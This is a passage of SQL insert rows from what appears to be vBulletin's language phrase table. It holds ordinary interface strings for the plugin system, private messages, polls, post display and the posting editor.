(36690, -1, 'php_version', 'plugins', 'PHP Version', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36691, -1, 'plugin_active_desc', 'plugins', 'If this plugin is marked as inactive, it will not be called by vBulletin. Use this to temporarily turn plugins on and off.', 'vbulletin', '', 0, ''),
(36692, -1, 'plugin_code_desc', 'plugins', 'Use this field to enter the PHP code that you would like to be run.', 'vbulletin', '', 0, ''),
(36693, -1, 'plugin_execution_order', 'plugins', 'Execution Order', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36694, -1, 'plugin_inactive_due_to_product_disabled', 'plugins', 'This plugin is currently inactive due to the product {1} being disabled. ', 'vbulletin', '', 0, ''),
(36695, -1, 'plugin_is_active', 'plugins', 'Plugin is Active', 'vbulletin', '', 0, ''),
(36696, -1, 'plugin_order_desc', 'plugins', 'Use this field to enter the order in which code at the same hook will be executed.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36697, -1, 'plugin_php_code', 'plugins', 'Plugin PHP Code', 'vbulletin', '', 0, ''),
(36698, -1, 'plugin_products_system', 'plugins', 'Plugin & Products System', 'vbulletin', 'vBulletin Solutions', 1161596475, '3.6.3'),
(36699, -1, 'plugin_system', 'plugins', 'Plugin System', 'vbulletin', '', 0, ''),
(36700, -1, 'plugin_title_desc', 'plugins', 'Enter a title that describes this plugin.', 'vbulletin', '', 0, ''),
(36701, -1, 'plugins_disable_config', 'plugins', 'Warning: Plugins are currently globally disabled via config.php.', 'vbulletin', '', 0, ''),
(36702, -1, 'plugins_disabled_options', 'plugins', 'Warning: Plugins are currently globally disabled in your options. In order for plugins and products to function correctly, you must enable the plugin system . Importing a product will do this for you automatically.', 'vbulletin', '', 0, ''),
(36703, -1, 'product_id', 'plugins', 'Product ID', 'vbulletin', '', 0, ''),
(36704, -1, 'product_incompatible_version_x_mysql', 'plugins', 'This product is not compatible with version {1} of MySQL. {2}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36705, -1, 'product_incompatible_version_x_php', 'plugins', 'This product is not compatible with version {1} of PHP. {2}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36706, -1, 'product_incompatible_version_x_product_y', 'plugins', 'This product is not compatible with version {1} of the product {3} . {2}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36707, -1, 'product_incompatible_version_x_vbulletin', 'plugins', 'This product is not compatible with version {1} of vBulletin. {2}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36708, -1, 'product_url', 'plugins', 'Product URL', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36709, -1, 'product_x_must_be_activated', 'plugins', 'The product {1} must be activated before this product may be installed.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36710, -1, 'product_x_must_be_installed', 'plugins', 'The product {1} must be installed before this product may be installed. {2}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36711, -1, 'product_x_out_of_date', 'plugins', 'Product {1} is out of date.', 'vbulletin', 'vBulletin Solutions', 1156849692, '3.6.1'),
(36712, -1, 'product_x_up_to_date', 'plugins', 'Product {1} is up to date.', 'vbulletin', 'vBulletin Solutions', 1156849525, '3.6.1'),
(36713, -1, 'save_active_status', 'plugins', 'Save Active Status', 'vbulletin', '', 0, ''),
(36714, -1, 'save_and_reload', 'plugins', 'Save and Reload', 'vbulletin', 'vBulletin Solutions', 1222260212, '3.8.0 Alpha 2'),
(36715, -1, 'uninstall', 'plugins', 'Uninstall', 'vbulletin', '', 0, ''),
(36716, -1, 'uninstall_code', 'plugins', 'Uninstall Code', 'vbulletin', '', 0, ''),
(36717, -1, 'uninstall_product_break_products_x', 'plugins', 'If you uninstall this product, the following products may no longer function:\r\n{1} ', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36718, -1, 'vb_prefix_reserved', 'plugins', 'The product ID prefix vb is reserved for official vBulletin products. \r\n \r\nIf you have not received express permission from the vBulletin development team to use the vb prefix, please alter your product ID now.', 'vbulletin', '', 0, ''),
(36719, -1, 'vbulletin_version', 'plugins', 'vBulletin Version', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36720, -1, 'version', 'plugins', 'Version', 'vbulletin', '', 0, ''),
(36721, -1, 'version_check_url', 'plugins', 'Version Check URL', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36722, -1, '0_to_9', 'pm', '0 - 9', 'vbulletin', 'vBulletin Solutions', 1214574617, '3.8.0 Alpha 1'),
(36723, -1, 'a_to_h', 'pm', 'A - H', 'vbulletin', 'vBulletin Solutions', 1214574685, '3.8.0 Alpha 1'),
(36724, -1, 'all_messages', 'pm', 'All Messages', 'vbulletin', 'vBulletin Solutions', 1219756035, '3.8.0 Alpha 1'),
(36725, -1, 'bcc', 'pm', 'BCC', 'vbulletin', 'vBulletin Solutions', 1151087521, '3.6.0 Beta 4'),
(36726, -1, 'confirm_deletion', 'pm', 'Confirm Deletion', 'vbulletin', '', 0, ''),
(36727, -1, 'confirm_outstanding_receipt', 'pm', 'Confirm Outstanding Receipt', 'vbulletin', '', 0, ''),
(36728, -1, 'confirmed_private_message_receipts', 'pm', 'Confirmed Private Message Receipts', 'vbulletin', '', 0, ''),
(36729, -1, 'csv', 'pm', 'CSV', 'vbulletin', '', 0, ''),
(36730, -1, 'delete_items_in_x', 'pm', 'Are you sure you want to permanently delete all items in \'{1}\'?', 'vbulletin', '', 0, ''),
(36731, -1, 'delete_message', 'pm', 'Delete Message', 'vbulletin', '', 0, ''),
(36732, -1, 'delete_message_click_button', 'pm', 'To delete this message, check the appropriate option below and then click the \'Delete this Message\' button.', 'vbulletin', '', 0, ''),
(36733, -1, 'delete_this_message', 'pm', 'Delete this Message', 'vbulletin', '', 0, ''),
(36734, -1, 'deselect_all_messages', 'pm', 'Deselect all Messages', 'vbulletin', 'vBulletin Solutions', 1218719909, '3.8.0 Alpha 1'),
(36735, -1, 'download_all_private_messages_as', 'pm', 'Download all Private Messages as', 'vbulletin', '', 0, ''),
(36736, -1, 'download_as_csv', 'pm', 'Download as CSV', 'vbulletin', '', 0, ''),
(36737, -1, 'download_as_text', 'pm', 'Download as TEXT', 'vbulletin', '', 0, ''),
(36738, -1, 'download_as_xml', 'pm', 'Download as XML', 'vbulletin', '', 0, ''),
(36739, -1, 'dump_from', 'pm', 'From', 'vbulletin', '', 0, ''),
(36740, -1, 'dump_privatemessages', 'pm', 'privatemessages', 'vbulletin', '', 0, ''),
(36741, -1, 'dump_to', 'pm', 'To', 'vbulletin', '', 0, ''),
(36742, -1, 'empty_folder', 'pm', 'Empty Folder', 'vbulletin', '', 0, ''),
(36743, -1, 'file_type', 'pm', 'File Type', 'vbulletin', '', 0, ''),
(36744, -1, 'filter', 'pm', 'Filter', 'vbulletin', 'vBulletin Solutions', 1221838973, '3.8.0 Alpha 2'),
(36745, -1, 'folder_id_x', 'pm', 'Folder id: {1}', 'vbulletin', '', 0, ''),
(36746, -1, 'forward_message', 'pm', 'Forward Message', 'vbulletin', '', 0, ''),
(36747, -1, 'forward_prefix', 'pm', 'Fw:', 'vbulletin', 'vBulletin Solutions', 1227112183, '3.8.0 Beta 4'),
(36748, -1, 'forwarded_message', 'pm', 'Forwarded Message', 'vbulletin', '', 0, ''),
(36749, -1, 'i_to_p', 'pm', 'I - P', 'vbulletin', 'vBulletin Solutions', 1214574704, '3.8.0 Alpha 1'),
(36750, -1, 'last_month', 'pm', 'Last Month', 'vbulletin', '', 0, ''),
(36751, -1, 'last_week', 'pm', 'Last Week', 'vbulletin', '', 0, ''),
(36752, -1, 'mark_as_read', 'pm', 'Mark as read', 'vbulletin', '', 0, ''),
(36753, -1, 'mark_as_unread', 'pm', 'Mark as unread', 'vbulletin', '', 0, ''),
(36754, -1, 'may_send_to_x_people', 'pm', 'You may send your message to up to {1} people at a time.', 'vbulletin', 'vBulletin Solutions', 1154602996, '3.6.0'),
(36755, -1, 'message_history', 'pm', 'Message History', 'vbulletin', 'vBulletin Solutions', 1226492034, '3.8.0 Beta 3'),
(36756, -1, 'message_tracking', 'pm', 'Message Tracking', 'vbulletin', '', 0, ''),
(36757, -1, 'messages_stored_in_folder_x', 'pm', 'Messages stored in this folder: {1}', 'vbulletin', '', 0, ''),
(36758, -1, 'move_private_messages', 'pm', 'Move Private Messages', 'vbulletin', '', 0, ''),
(36759, -1, 'no_message_history', 'pm', 'This message has no saved history.', 'vbulletin', 'vBulletin Solutions', 1226501042, '3.8.0 Beta 3'),
(36760, -1, 'no_messages_to_display', 'pm', 'There are no messages to display. Try a different search.', 'vbulletin', 'vBulletin Solutions', 1214919219, '3.8.0 Alpha 1'),
(36761, -1, 'not_replied_to', 'pm', 'Not Replied To', 'vbulletin', 'vBulletin Solutions', 1223907889, '3.8.0 Beta 2'),
(36762, -1, 'not_tracking_any_messages', 'pm', 'You are currently not tracking any messages.', 'vbulletin', '', 0, ''),
(36763, -1, 'old_messages', 'pm', 'Old Messages', 'vbulletin', 'vBulletin Solutions', 1214576806, '3.8.0 Alpha 1'),
(36764, -1, 'other', 'pm', 'Other', 'vbulletin', 'vBulletin Solutions', 1214574742, '3.8.0 Alpha 1'),
(36765, -1, 'pm_non_contact_option', 'pm', 'Send message to users even if they are not on your contact list.', 'vbulletin', 'vBulletin Solutions', 1196424297, '3.7.0 Beta 1'),
(36766, -1, 'pm_non_contact_option_description', 'pm', 'Your options are currently set to accept private messages only from your contacts . If you send a message to a user not on your contact list, they will not be able to reply to you.', 'vbulletin', 'vBulletin Solutions', 1196433755, '3.7.0 Beta 1'),
(36767, -1, 'pm_non_contacts_heading', 'pm', 'Send Message to Non-Contacts', 'vbulletin', 'vBulletin Solutions', 1207317914, '3.7.0 Release Candidate 3'),
(36768, -1, 'post_new_private_message', 'pm', 'Send New Private Message', 'vbulletin', '', 0, ''),
(36769, -1, 'private_message_dump_for_user_x_y', 'pm', 'Private Message Dump for User {1}; {2}', 'vbulletin', '', 0, ''),
(36770, -1, 'private_message_receipt', 'pm', 'Private Message Receipt', 'vbulletin', '', 0, ''),
(36771, -1, 'private_messages_in_folder', 'pm', 'Private Messages in Folder', 'vbulletin', '', 0, ''),
(36772, -1, 'q_to_z', 'pm', 'Q - Z', 'vbulletin', 'vBulletin Solutions', 1214574719, '3.8.0 Alpha 1'),
(36773, -1, 'read', 'pm', 'Read', 'vbulletin', '', 0, ''),
(36774, -1, 'read_date', 'pm', 'Read Date', 'vbulletin', '', 0, ''),
(36775, -1, 'read_message', 'pm', 'Read Message', 'vbulletin', '', 0, ''),
(36776, -1, 'read_messages', 'pm', 'Read Messages', 'vbulletin', 'vBulletin Solutions', 1219756072, '3.8.0 Alpha 1'),
(36777, -1, 'recipient_usernames', 'pm', 'Recipient Username(s)', 'vbulletin', '', 0, ''),
(36778, -1, 'recipients', 'pm', 'Recipients', 'vbulletin', '', 0, ''),
(36779, -1, 'replied_to', 'pm', 'Replied To', 'vbulletin', 'vBulletin Solutions', 1223907872, '3.8.0 Beta 2'),
(36780, -1, 'repliedto_message', 'pm', 'Replied-to Message', 'vbulletin', '', 0, ''),
(36781, -1, 'reply_to_private_message', 'pm', 'Reply to Private Message', 'vbulletin', '', 0, ''),
(36782, -1, 'request_receipt_for_message', 'pm', 'Request a read receipt for this message', 'vbulletin', '', 0, ''),
(36783, -1, 'save_copy_in_sent_items_folder', 'pm', 'Save a copy of this message in your Sent Items folder.', 'vbulletin', '', 0, ''),
(36784, -1, 'select_deselect_all_in_group', 'pm', 'Select / deselect all in this group', 'vbulletin', 'vBulletin Solutions', 1223906357, '3.8.0 Beta 2'),
(36785, -1, 'selected_messages', 'pm', 'Selected Messages', 'vbulletin', '', 0, ''),
(36786, -1, 'sender', 'pm', 'Sender', 'vbulletin', 'vBulletin Solutions', 1214568143, '3.8.0 Alpha 1'),
(36787, -1, 'sent_date', 'pm', 'Sent Date', 'vbulletin', '', 0, ''),
(36788, -1, 'sent_to', 'pm', 'Sent to', 'vbulletin', '', 0, ''),
(36789, -1, 'separate_multiple_names', 'pm', 'Separate multiple user names with \';\'', 'vbulletin', '', 0, ''),
(36790, -1, 'show_messages', 'pm', 'Show Messages', 'vbulletin', 'vBulletin Solutions', 1214584010, '3.8.0 Alpha 1'),
(36791, -1, 'standard_folders', 'pm', 'Standard Folders', 'vbulletin', '', 0, ''),
(36792, -1, 'text', 'pm', 'Text', 'vbulletin', '', 0, ''),
(36793, -1, 'to_delete_a_folder', 'pm', 'To delete a folder, remove the folder\'s name from the list. All messages stored in this folder will be moved to the Inbox.', 'vbulletin', '', 0, ''),
(36794, -1, 'total_messages_in_all_folders_x', 'pm', 'Total messages stored in all folders: {1}', 'vbulletin', '', 0, ''),
(36795, -1, 'unconfirmed_private_message_receipts', 'pm', 'Unconfirmed Private Message Receipts', 'vbulletin', '', 0, ''),
(36796, -1, 'unread_message', 'pm', 'Unread Message', 'vbulletin', '', 0, ''),
(36797, -1, 'unread_messages', 'pm', 'Unread Messages', 'vbulletin', 'vBulletin Solutions', 1219756052, '3.8.0 Alpha 1'),
(36798, -1, 'unreadable_data', 'pm', 'Unreadable Data', 'vbulletin', '', 0, ''),
(36799, -1, 'view_history', 'pm', 'View History', 'vbulletin', 'vBulletin Solutions', 1226492058, '3.8.0 Beta 3'),
(36800, -1, 'view_message', 'pm', 'View Message', 'vbulletin', '', 0, ''),
(36801, -1, 'x_contains_y_messages', 'pm', '{2} contains {3} stored messages.', 'vbulletin', '', 0, ''),
(36802, -1, 'x_contains_y_z_messages_of_xx', 'pm', '{1} contains {2} messages. You have {3} messages stored, of a total {4} allowed.', 'vbulletin', '', 0, ''),
(36803, -1, 'x_has_requested_a_read_receipt', 'pm', '{1} has requested a read receipt - Confirm?', 'vbulletin', '', 0, ''),
(36804, -1, 'x_requested_read_receipt', 'pm', '{1} has requested a read receipt - Confirm? ', 'vbulletin', '', 0, ''),
(36805, -1, 'xml', 'pm', 'XML', 'vbulletin', '', 0, ''),
(36806, -1, 'you_have_x_and_y_receipts', 'pm', 'You have {1} confirmed and {2} unconfirmed private message receipts.', 'vbulletin', '', 0, ''),
(36807, -1, 'your_custom_folders', 'pm', 'Your Custom Folders', 'vbulletin', '', 0, ''),
(36808, -1, 'additional_option_1', 'poll', 'Additional Option 1', 'vbulletin', '', 0, ''),
(36809, -1, 'additional_option_2', 'poll', 'Additional Option 2', 'vbulletin', '', 0, ''),
(36810, -1, 'allow_multiple_choice', 'poll', 'Allow multiple choice: Give users the ability to select more than one answer', 'vbulletin', '', 0, ''),
(36811, -1, 'automatically_close_poll_enter_days', 'poll', 'If you would like this poll to automatically close after a period of time, enter a number of days here. Set this to 0 if you would like the poll to remain open indefinitely.', 'vbulletin', '', 0, ''),
(36812, -1, 'close_poll', 'poll', 'Close poll', 'vbulletin', '', 0, ''),
(36813, -1, 'closing_poll_impossible_to_vote', 'poll', 'Note: Closing this poll makes it impossible to vote. It however does not stop people from replying to the thread', 'vbulletin', '', 0, ''),
(36814, -1, 'days_after_x', 'poll', 'days after {1}', 'vbulletin', '', 0, ''),
(36815, -1, 'keep_poll_options_short', 'poll', 'Remember to keep the poll options short and to the point', 'vbulletin', '', 0, ''),
(36816, -1, 'make_votes_public', 'poll', 'Make votes public: Displays all users who voted, and what choice they voted for.', 'vbulletin', '', 0, ''),
(36817, -1, 'option_x', 'poll', 'Option {1}', 'vbulletin', '', 0, ''),
(36818, -1, 'poll_preview', 'poll', 'Poll Preview', 'vbulletin', '', 0, ''),
(36819, -1, 'poll_question', 'poll', 'Poll Question', 'vbulletin', '', 0, ''),
(36820, -1, 'poll_timeout', 'poll', 'Poll Timeout', 'vbulletin', '', 0, ''),
(36821, -1, 'preview_poll', 'poll', 'Preview Poll', 'vbulletin', '', 0, ''),
(36822, -1, 'submit_new_poll', 'poll', 'Submit New Poll', 'vbulletin', '', 0, ''),
(36823, -1, 'to_close_this_poll_check_this_box', 'poll', 'To close this poll, check this box.', 'vbulletin', '', 0, ''),
(36824, -1, 'update_options', 'poll', 'Update options', 'vbulletin', '', 0, ''),
(36825, -1, 'add_infraction_for_x', 'postbit', 'Add Infraction for {1}', 'vbulletin', 'vBulletin Solutions', 1149246215, '3.6.0 Beta 1'),
(36826, -1, 'add_to_xs_reputation', 'postbit', 'Add to {1}\'s Reputation', 'vbulletin', '', 0, ''),
(36827, -1, 'attached_files', 'postbit', 'Attached Files', 'vbulletin', '', 0, ''),
(36828, -1, 'attached_images', 'postbit', 'Attached Images', 'vbulletin', '', 0, ''),
(36829, -1, 'attached_thumbnails', 'postbit', 'Attached Thumbnails', 'vbulletin', '', 0, ''),
(36830, -1, 'attachments_pending_approval', 'postbit', 'Attachments Pending Approval', 'vbulletin', '', 0, ''),
(36831, -1, 'edit_delete_message', 'postbit', 'Edit/Delete Message', 'vbulletin', '', 0, ''),
(36832, -1, 'file_type_x', 'postbit', 'File Type: {1}', 'vbulletin', '', 0, ''),
(36833, -1, 'find_more_posts_by_x', 'postbit', 'Find More Posts by {1}', 'vbulletin', '', 0, ''),
(36834, -1, 'forward', 'postbit', 'Forward', 'vbulletin', '', 0, ''),
(36835, -1, 'image_larger_version_x_y_z', 'postbit', 'Click image for larger version\r\n\r\nName: {1}\r\nViews: {2}\r\nSize: {3}\r\nID: {4}', 'vbulletin', '', 0, ''),
(36836, -1, 'image_x_y_z', 'postbit', 'Name: {1}\r\nViews: {2}\r\nSize: {3}', 'vbulletin', '', 0, ''),
(36837, -1, 'ip', 'postbit', 'IP', 'vbulletin', '', 0, ''),
(36838, -1, 'last_edited_by_x_on_y_at_z', 'postbit', 'Last edited by {1}; {2} at {3} .', 'vbulletin', 'vBulletin Solutions', 1221263767, '3.8.0 Alpha 1'),
(36839, -1, 'last_edited_link_by_x_on_y_at_z_postid', 'postbit', 'Last edited by {1} ; {2} at {3} .', 'vbulletin', 'vBulletin Solutions', 1221263709, '3.8.0 Alpha 1'),
(36840, -1, 'multi_quote_this_message', 'postbit', 'Multi-Quote This Message', 'vbulletin', 'vBulletin Solutions', 1148659351, '3.6.0 Beta 1'),
(36841, -1, 'post_has_been_automoderated', 'postbit', 'Thank you for posting! Your post will not be visible until a moderator has approved it for posting.', 'vbulletin', 'vBulletin Solutions', 1209557813, '3.7.1'),
(36842, -1, 'quick_reply_to_this_message', 'postbit', 'Quick reply to this message', 'vbulletin', '', 0, ''),
(36843, -1, 'received_infraction', 'postbit', 'Received Infraction', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36844, -1, 'received_warning', 'postbit', 'Received Warning', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36845, -1, 'remove_user_from_ignore_list', 'postbit', 'Remove user from ignore list', 'vbulletin', '', 0, ''),
(36846, -1, 'reply_with_quote', 'postbit', 'Reply With Quote', 'vbulletin', '', 0, ''),
(36847, -1, 'report_bad_post', 'postbit', 'Report Post', 'vbulletin', 'vBulletin Solutions', 1153239738, '3.6.0 Release Candidate 3'),
(36848, -1, 'reppower', 'postbit', 'Rep Power', 'vbulletin', '', 0, ''),
(36849, -1, 'send_email_to_x', 'postbit', 'Send email to {1}', 'vbulletin', '', 0, ''),
(36850, -1, 'view_public_profile', 'postbit', 'View Public Profile', 'vbulletin', '', 0, ''),
(36851, -1, 'visit_xs_homepage', 'postbit', 'Visit {1}\'s homepage!', 'vbulletin', '', 0, ''),
(36852, -1, 'x_until_y', 'postbit', '{1} until {2}', 'vbulletin', '', 0, ''),
(36853, -1, 'x_views', 'postbit', '{1} views', 'vbulletin', '', 0, ''),
(36854, -1, 'xs_avatar', 'postbit', '{1}\'s Avatar', 'vbulletin', '', 0, ''),
(36855, -1, 'add_edit_files_attached', 'posting', 'Click here to add or edit files attached to this message', 'vbulletin', '', 0, ''),
(36856, -1, 'add_tags', 'posting', 'Add Tags', 'vbulletin', 'vBulletin Solutions', 1190903874, '3.7.0 Beta 1'),
(36857, -1, 'added_by_x', 'posting', 'Added by {1}', 'vbulletin', 'vBulletin Solutions', 1196431820, '3.7.0 Beta 1'),
(36858, -1, 'additional_options', 'posting', 'Additional Options', 'vbulletin', '', 0, ''),
(36859, -1, 'align_center', 'posting', 'Align Center', 'vbulletin', '', 0, ''),
(36860, -1, 'align_left', 'posting', 'Align Left', 'vbulletin', '', 0, ''),
(36861, -1, 'align_right', 'posting', 'Align Right', 'vbulletin', '', 0, ''),
(36862, -1, 'attach_files', 'posting', 'Attach Files', 'vbulletin', '', 0, ''),
(36863, -1, 'attachment_key', 'posting', 'Attachment Key', 'vbulletin', '', 0, ''),
(36864, -1, 'author', 'posting', 'Author', 'vbulletin', 'vBulletin Solutions', 1156883834, '3.6.1'),
(36865, -1, 'automatically_parse_links_in_text', 'posting', 'Automatically parse links in text', 'vbulletin', '', 0, ''),
(36866, -1, 'average', 'posting', 'Average', 'vbulletin', '', 0, ''),
(36867, -1, 'bad', 'posting', 'Bad', 'vbulletin', '', 0, ''),
(36868, -1, 'bold', 'posting', 'Bold', 'vbulletin', '', 0, ''),
(36869, -1, 'browse', 'posting', 'Browse', 'vbulletin', '', 0, ''),
(36870, -1, 'browser_is_safari_no_wysiwyg', 'posting', 'The Safari browser does not support WYSIWYG mode.', 'vbulletin', '', 0, ''),
(36871, -1, 'can_add_a_score_for_thread', 'posting', 'If you like, you can add a score for this thread.', 'vbulletin', '', 0, ''),
(36872, -1, 'cannot_add_tags_remove_first', 'posting', 'You cannot add any tags to this thread. Please remove some first.', 'vbulletin', 'vBulletin Solutions', 1196431660, '3.7.0 Beta 1'),
(36873, -1, 'check_spelling', 'posting', 'Check Spelling', 'vbulletin', '', 0, ''),
(36874, -1, 'choose_a_rating', 'posting', 'Choose a rating', 'vbulletin', '', 0, ''),
(36875, -1, 'choose_file', 'posting', 'Choose File', 'vbulletin', '', 0, ''),
(36876, -1, 'close_this_thread', 'posting', 'Close this thread after you submit your message', 'vbulletin', '', 0, ''),
(36877, -1, 'color', 'posting', 'Color', 'vbulletin', '', 0, ''),
(36878, -1, 'colors', 'posting', 'Colors', 'vbulletin', '', 0, ''),
(36879, -1, 'compare_versions', 'posting', 'Compare Versions', 'vbulletin', 'vBulletin Solutions', 1191498456, '3.7.0 Beta 1'),
(36880, -1, 'complete_image_verification', 'posting', 'You did not complete the Image Verification', 'vbulletin', 'vBulletin Solutions', 1144868057, '3.6.0 Beta 1'),
(36881, -1, 'copy', 'posting', 'Copy', 'vbulletin', '', 0, ''),
(36882, -1, 'cut', 'posting', 'Cut', 'vbulletin', '', 0, ''),
(36883, -1, 'decrease_indent', 'posting', 'Decrease Indent', 'vbulletin', '', 0, ''),
(36884, -1, 'delete_message', 'posting', 'Delete Message', 'vbulletin', '', 0, ''),
(36885, -1, 'delete_message_check_appropriate_option', 'posting', 'To delete this message, check the appropriate option below and then click the \'Delete this Message\' button.', 'vbulletin', '', 0, ''),
(36886, -1, 'delete_this_message', 'posting', 'Delete this Message', 'vbulletin', '', 0, ''),
(36887, -1, 'deleting_message_deletion_of_thread', 'posting', 'Note: deleting this message will result in the deletion of the entire thread because this is the first post in the thread.', 'vbulletin', '', 0, ''),
(36888, -1, 'deletion_options', 'posting', 'Deletion Options', 'vbulletin', '', 0, ''),
(36889, -1, 'disable_smilies_in_text', 'posting', 'Disable smilies in text', 'vbulletin', '', 0, ''),
(36890, -1, 'do_not_delete_message', 'posting', 'Do Not Delete Message', 'vbulletin', '', 0, ''),
(36891, -1, 'do_not_subscribe', 'posting', 'Do not subscribe', 'vbulletin', '', 0, ''),
(36892, -1, 'edit_announcement', 'posting', 'Edit Announcement', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36893, -1, 'edit_tags', 'posting', 'Edit Tags', 'vbulletin', 'vBulletin Solutions', 1190903901, '3.7.0 Beta 1'),
(36894, -1, 'enter_email_link', 'posting', 'Please enter the email address for the link:', 'vbulletin', 'vBulletin Solutions', 1156544066, '3.6.1'),
(36895, -1, 'enter_image_url', 'posting', 'Please enter the URL of your image:', 'vbulletin', '', 0, ''),
(36896, -1, 'enter_link_text', 'posting', 'Enter the text to be displayed for the link (optional):', 'vbulletin', '', 0, ''),
(36897, -1, 'enter_link_url', 'posting', 'Please enter the URL of your link:', 'vbulletin', '', 0, ''),
(36898, -1, 'enter_list_item', 'posting', 'Enter a list item.\\r\\nLeave the box empty or press \'Cancel\' to complete the list:', 'vbulletin', '', 0, ''),
(36899, -1, 'enter_list_type', 'posting', 'What type of list do you want? Enter \'1\' for a numbered list, enter \'a\' for an alphabetical list, or leave blank for a list with bullet points:', 'vbulletin', '', 0, ''),
(36900, -1, 'enter_option_x_tag', 'posting', 'Enter the option for the [{1}] tag:', 'vbulletin', '', 0, ''),
(36901, -1, 'enter_tag_option', 'posting', 'Please enter the option for your {1} tag:', 'vbulletin', '', 0, ''),
(36902, -1, 'enter_text_to_be_formatted', 'posting', 'Enter the text to be formatted', 'vbulletin', '', 0, ''),
(36903, -1, 'excellent', 'posting', 'Excellent', 'vbulletin', '', 0, ''),
(36904, -1, 'explicit', 'posting', 'Explicit', 'vbulletin', 'vBulletin Solutions', 1156883850, '3.6.1'),
(36905, -1, 'filesize_bytes', 'posting', 'Filesize (bytes)', 'vbulletin', 'vBulletin Solutions', 1152639623, '3.6.0 Release Candidate 2'),
(36906, -1, 'filetype', 'posting', 'Filetype', 'vbulletin', '', 0, ''),
(36907, -1, 'fonts', 'posting', 'Fonts', 'vbulletin', '', 0, ''),
(36908, -1, 'go_advanced', 'posting', 'Go Advanced', 'vbulletin', '', 0, ''),
(36909, -1, 'good', 'posting', 'Good', 'vbulletin', '', 0, ''),
(36910, -1, 'have_uploaded_maximum_x_files', 'posting', 'You have uploaded the maximum of {1} files', 'vbulletin', '', 0, ''),
(36911, -1, 'iespell_not_installed', 'posting', 'ieSpell is a spell-checking tool for Internet Explorer.\r\n\r\nIf you would like to download ieSpell, click OK; otherwise click Cancel.\r\n\r\nieSpell can be downloaded from http://www.iespell.com', 'vbulletin', '', 0, ''),
(36912, -1, 'increase_indent', 'posting', 'Increase Indent', 'vbulletin', '', 0, ''),
(36913, -1, 'indent', 'posting', 'Indent', 'vbulletin', '', 0, ''),
(36914, -1, 'insert_all', 'posting', 'Insert All', 'vbulletin', '', 0, ''),
(36915, -1, 'insert_email_link', 'posting', 'Insert Email Link', 'vbulletin', '', 0, ''),
(36916, -1, 'insert_image', 'posting', 'Insert Image', 'vbulletin', '', 0, ''),
(36917, -1, 'insert_link', 'posting', 'Insert Link', 'vbulletin', '', 0, ''),
(36918, -1, 'italic', 'posting', 'Italic', 'vbulletin', '', 0, ''),
(36919, -1, 'keep_attachments', 'posting', 'Keep Attachments', 'vbulletin', '', 0, ''),
(36920, -1, 'keywords', 'posting', 'Keywords', 'vbulletin', 'vBulletin Solutions', 1156883841, '3.6.1'),
(36921, -1, 'max_filesize', 'posting', 'Max Filesize', 'vbulletin', '', 0, ''),
(36922, -1, 'max_height', 'posting', 'Max Height', 'vbulletin', '', 0, ''),
(36923, -1, 'max_width', 'posting', 'Max Width', 'vbulletin', '', 0, ''),
(36924, -1, 'maximum', 'posting', 'Maximum', 'vbulletin', '', 0, ''),
(36925, -1, 'message_by_x_on_y_at_z', 'posting', 'Message originally posted by {2} on {3} at {4} ', 'vbulletin', '', 0, ''),
(36926, -1, 'message_too_short', 'posting', 'The message you have entered is too short. Please lengthen your message to at least {1} characters.', 'vbulletin', 'vBulletin Solutions', 1156544084, '3.6.1'),
(36927, -1, 'more', 'posting', 'More', 'vbulletin', '', 0, ''),
(36928, -1, 'moz_edit_config_file', 'posting', 'You need to edit your Mozilla config file to allow this action.', 'vbulletin', '', 0, ''),
(36929, -1, 'moz_must_select_text', 'posting', 'Mozilla requires that you must select some text for this function to work', 'vbulletin', '', 0, ''),
(36930, -1, 'must_enter_subject', 'posting', 'You must enter a title / subject!', 'vbulletin', '', 0, ''),
(36931, -1, 'must_select_text_to_use', 'posting', 'You must select some text to use this function.', 'vbulletin', '', 0, ''),
(36932, -1, 'must_select_two_version_comparison', 'posting', 'You must select two different versions to make a valid comparison.', 'vbulletin', 'vBulletin Solutions', 1191498292, '3.7.0 Beta 1'),
(36933, -1, 'number_of_poll_options', 'posting', 'Number of poll options', 'vbulletin', '', 0, ''),
(36934, -1, 'ordered_list', 'posting', 'Ordered List', 'vbulletin', '', 0, ''),
(36935, -1, 'original_post', 'posting', 'Original Post', 'vbulletin', 'vBulletin Solutions', 1191498155, '3.7.0 Beta 1'),
(36936, -1, 'paste', 'posting', 'Paste', 'vbulletin', '', 0, ''),
(36937, -1, 'physically_remove_message', 'posting', 'Physically Remove Message', 'vbulletin', '', 0, ''),
(36938, -1, 'podcast_options', 'posting', 'Podcast Options', 'vbulletin', 'vBulletin Solutions', 1156887056, '3.6.1'),
(36939, -1, 'podcast_url', 'posting', 'Podcast URL', 'vbulletin', 'vBulletin Solutions', 1152636834, '3.6.0 Release Candidate 2'),
(36940, -1, 'post_a_poll', 'posting', 'Post a Poll', 'vbulletin', '', 0, ''),
(36941, -1, 'post_comparison', 'posting', 'Post Comparison', 'vbulletin', 'vBulletin Solutions', 1194539201, '3.7.0 Beta 1'),
(36942, -1, 'post_edit_history', 'posting', 'Post Edit History', 'vbulletin', 'vBulletin Solutions', 1191498206, '3.7.0 Beta 1'),
(36943, -1, 'post_new_announcement', 'posting', 'Post New Announcement', 'vbulletin', 'vBulletin Solutions', 1142641239, '3.6.0 Beta 1'),
